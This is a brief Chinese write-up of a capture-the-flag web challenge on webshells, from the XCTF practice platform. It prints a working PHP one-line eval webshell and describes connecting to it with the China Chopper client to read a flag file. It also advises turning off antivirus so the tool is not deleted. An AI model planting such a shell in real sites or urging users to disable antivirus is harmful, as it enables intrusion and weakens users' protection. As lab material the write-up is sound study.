攻防世界(web)---webshell

Posted oooooooohhhhh

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了攻防世界(web)---webshell相关的知识,希望对你有一定的参考价值。

此题我用中国菜刀完成。

<?php @eval($_POST['shell']);?>  是一句话木马,可用中国菜刀上传。若打不开建议把电脑杀毒软件关闭,因为电脑会在你双击打开时自动删除caidao.exe。

上传方法为:打开菜刀——右键——添加—地址填写网站地址——地址右边选项相当于要填一句话的密码,<?php @eval($_POST['shell']);?> 的密码为shell——将类型改为PHP——确认

 

然后查看网站的内容,获得网站信息,点开flag.txt即可查看此题flag。

以上是关于攻防世界(web)---webshell的主要内容,如果未能解决你的问题,请参考以下文章

【网警提醒】基础网络攻防之webshell攻击

《攻防世界》学习笔记——web篇

攻防世界WEB进阶之upload1

攻防世界 web leaking

攻防世界WEB练习 | easyphp

攻防世界 web2 write up